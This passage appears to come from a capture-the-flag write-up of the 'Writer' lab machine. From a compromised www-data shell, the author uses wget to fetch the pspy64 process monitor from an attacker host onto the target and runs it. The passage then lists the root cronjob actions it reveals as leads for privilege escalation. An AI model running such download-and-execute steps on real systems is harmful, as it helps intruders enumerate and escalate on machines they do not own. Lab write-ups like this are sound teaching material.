Writer_PSPY

PSPY

---

A root cronjob process was found

www-data@writer:/dev/shm$ wget -q http://10.10.14.2/pspy64 ; chmod 755 ./pspy64

Delivery complete

www-data@writer:/dev/shm$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
 
 
     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     
 
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done

Executing PSPY

Processes

---

The root cronjob processes is

• copying the /root/.scripts/writer2_project directory to the /var/www directory
• removing everything under the /tmp directory
• copying the /root/.scripts/disclaimer file to the /etc/postfix/disclaimer file
• copying the /root/.scripts/master.cf file to the /etc/postfix/master.cf file
• looking and removing files that have been modified within the last day in the /etc/apt/apt.conf.d/ directory
• Printing out other supporting architectures
• Updating the system repo using /usr/bin/apt-get